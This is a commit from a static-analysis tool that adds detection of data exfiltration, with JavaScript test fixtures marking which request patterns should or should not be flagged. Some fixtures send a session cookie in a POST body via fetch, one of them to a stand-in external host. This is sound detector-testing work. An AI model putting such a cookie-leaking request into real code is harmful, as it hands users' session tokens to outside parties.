Added Cap::DATA_EXFIL and taint fp and fn fixes on real repos (#59)

* feat: Enhance data exfiltration detection with source sensitivity gating for cookies and headers

* feat: Implement cross-file data exfiltration detection with parameter-specific gate filters

* feat: Add calibration tests and refine DATA_EXFIL severity scoring logic

* feat: Introduce per-detector configuration for data exfiltration suppression

* feat: Enhance DATA_EXFIL findings with destination field tracking in diagnostics and SARIF output

* feat: Add tainted body and URL handling for data exfiltration detection

* feat: Add integration tests and fixtures for DATA_EXFIL and SSRF detection in Go

* feat: Add Java integration tests and fixtures for DATA_EXFIL detection across multiple HTTP clients

* feat: Add synthetic externals handling for closure-captured variables in SSA

* feat: Implement closure-based suppression for resource leak findings

* feat: Add regression guards for shell-injection and taint propagation in for-of destructure patterns

* feat: Implement constructor cap narrowing for data exfiltration detection in HTTP request builders

* feat: Add gated sinks for data exfiltration detection in C and C++ using curl_easy_setopt

* feat: Implement DATA_EXFIL cap parity for backwards analysis and add integration tests

* feat: Add data exfiltration sinks for various languages and enhance documentation

* refactor: Simplify formatting and improve readability in various files

* refactor: Improve readability by simplifying conditional statements and adding clippy linting

* docs: Update CHANGELOG and comments for data exfiltration features and configuration

* docs: Clarify configuration instructions for data exfiltration trusted destinations

* docs: Enhance comments for evidence routing logic in data exfiltration
This commit is contained in:
Eli Peter 2026-05-01 10:59:52 -04:00 committed by GitHub
parent a438886217
commit 58f1794a4e
No known key found for this signature in database
GPG key ID: B5690EEEBB952194
189 changed files with 8421 additions and 383 deletions

View file

@ -1,11 +1,15 @@
// DATA_EXFIL fixture: a fixed destination URL and an attacker-influenced
// body. SSRF must NOT fire (destination is hardcoded) but `Cap::DATA_EXFIL`
// must fire on the body field — request-bound bytes are leaving the process
// via the outbound request payload.
// DATA_EXFIL fixture: a fixed destination URL and a sensitive (cookie /
// session) source flowing into the outbound body. SSRF must NOT fire
// (destination is hardcoded) but `Cap::DATA_EXFIL` must fire because the
// source is Sensitive (`req.cookies.session` carries auth material) — exactly
// the cross-boundary leak the cap targets.
//
// Plain user input echoed back into a body is intentionally not classified
// as data exfiltration, see `fetch_body_user_input_silenced.js`.
//
// Driven by `fetch_data_exfil_integration_tests.rs`.
function leakBody(req) {
var payload = req.body.message;
var payload = req.cookies.session;
fetch('/endpoint', {
method: 'POST',
body: payload,

View file

@ -0,0 +1,19 @@
// DATA_EXFIL type-suppression fixture: a Sensitive cookie source coerced
// to an integer via `parseInt(...)` is NOT a credential payload; the
// resulting numeric body cannot encode a session token, header secret, or
// other exfiltratable material. The type-aware sink suppression in
// `is_type_safe_for_sink` (see `src/ssa/type_facts.rs`) recognises the
// proven-`Int` SSA value at the gate and silences the cap.
//
// Negative regression: without DATA_EXFIL in the type-suppressible mask
// this would over-fire on every `fetch({ body: parseInt(req.cookies.x) })`
// pattern (e.g. analytics ingestion of session counters).
//
// Driven by `fetch_data_exfil_integration_tests.rs`.
function reportSessionCount(req) {
var count = parseInt(req.cookies.session_count, 10);
fetch('/metrics', {
method: 'POST',
body: count,
});
}

View file

@ -0,0 +1,15 @@
// DATA_EXFIL silenced regression fixture: plain user input echoed into the
// body of an outbound `fetch` to a fixed URL must NOT fire `Cap::DATA_EXFIL`.
// The user already controls `req.body.message` — surfacing it back into the
// request payload is not a cross-boundary disclosure. This is the canonical
// false-positive class for API gateways and telemetry forwarders that proxy
// `req.body`, killed by the source-sensitivity gate in `ast.rs`.
//
// Driven by `fetch_data_exfil_integration_tests.rs`.
function forward(req) {
var payload = req.body.message;
fetch('/endpoint', {
method: 'POST',
body: payload,
});
}

View file

@ -0,0 +1,17 @@
// DATA_EXFIL allowlist-suppression fixture.
//
// The destination URL has a static prefix (`https://api.internal/...`) that
// the test harness installs as a trusted destination via
// [detectors.data_exfil.trusted_destinations]. The body still carries a
// Sensitive source (`req.cookies.session`), but routing it through a known-
// trusted upstream is a *legitimate* forwarding pipeline: the cap is
// suppressed for this filter only.
//
// Driven by `fetch_data_exfil_suppression_tests.rs`.
function leakBody(req) {
var payload = req.cookies.session;
fetch('https://api.internal/forward', {
method: 'POST',
body: payload,
});
}

View file

@ -0,0 +1,15 @@
// DATA_EXFIL allowlist-NEGATIVE fixture.
//
// The destination URL prefix (`https://untrusted.example.com/`) is NOT
// covered by the harness-installed
// [detectors.data_exfil.trusted_destinations] entries, so the cap MUST
// still fire on a Sensitive source flowing into the body.
//
// Driven by `fetch_data_exfil_suppression_tests.rs`.
function leakBodyExternal(req) {
var payload = req.cookies.session;
fetch('https://untrusted.example.com/intake', {
method: 'POST',
body: payload,
});
}

View file

@ -0,0 +1,13 @@
// DATA_EXFIL sanitizer-convention fixture.
//
// `logEvent({user: req.cookies.session})` routes a Sensitive cookie source
// through a named telemetry boundary. The forwarding-wrapper convention
// (see docs/detectors/taint.md) treats `logEvent` as a default
// `Sanitizer(Cap::DATA_EXFIL)` so the cap does NOT fire on this call.
//
// Driven by `fetch_data_exfil_suppression_tests.rs`.
function track(req) {
logEvent({
user: req.cookies.session,
});
}